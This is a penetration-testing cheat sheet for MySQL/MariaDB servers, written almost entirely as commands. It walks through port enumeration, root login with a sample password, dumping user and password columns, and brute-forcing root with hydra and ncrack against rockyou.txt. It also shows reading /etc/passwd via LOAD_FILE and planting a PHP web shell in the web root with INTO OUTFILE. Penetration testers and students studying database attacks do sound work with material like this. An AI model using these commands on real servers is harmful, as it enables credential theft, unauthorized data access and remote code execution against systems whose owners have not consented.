Information

Default Port: 3306

PORT     STATE SERVICE
3306/tcp open  mysql

Enumeration

nc -vn 192.168.1.2 3306
timeout 0.1 bash -c "nc -nv 192.168.1.2 3306"

nmap -p3306 -sS 192.168.1.2
nmap -p3306 -sVC 192.168.1.2

Install Client

# mysql
apt install -y mariadb-client
# mysqlshow
apt install -y mariadb-client-compat

Connect

# localhost
mysql -u root -p
mysql -u root --password="dbpassw1234"
# remote
mysql -h 192.168.1.2 -u root -p
mysql -h 192.168.1.2 -u root --password="dbpassw1234"
# disable tls (client side only; credentials and queries are then sent in the clear)
# ERROR 2002 (HY000): Received error packet before completion of TLS handshake.
mysql -h 192.168.1.2 -u root -p --skip-ssl
mysql -h 192.168.1.2 -u root --password="dbpassw1234" --skip-ssl

Databases

List

# mysql
MariaDB [(none)]> show databases;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234"
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" --ssl=DISABLED

Enter

MariaDB [(none)]> use wordpress;

Tables

List

# mysql
MariaDB [wordpress]> show tables;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress --ssl=DISABLED

Columns

List

# mysql
MariaDB [(none)]> use wordpress;
MariaDB [wordpress]> describe users;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress users
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress users --ssl=DISABLED

Dump

# mysql
MariaDB [wordpress]> select * from users;                # all columns
MariaDB [wordpress]> select name,password from users;    # selected columns only
# mysql (one liner)
mysql -h 192.168.1.2 -u root --password="dbpassw1234" -e "select * from users" wordpress
mysql -h 192.168.1.2 -u root --password="dbpassw1234" -e "select * from users" wordpress --skip-ssl

Brute Force

hydra -t 64 -l root -P rockyou.txt mysql://192.168.1.2
ncrack --user root -P rockyou.txt mysql://192.168.1.2:3306

Functions

# run a shell command from the client via `system`
MariaDB [(none)]> system id
# run a shell command from the client via `\!` (same as `system`)
MariaDB [(none)]> \! id
# read files
MariaDB [(none)]> SELECT LOAD_FILE('/etc/passwd');
# rce
MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php";

Files

/home/<USER>/.mysql_history
/root/.mysql_history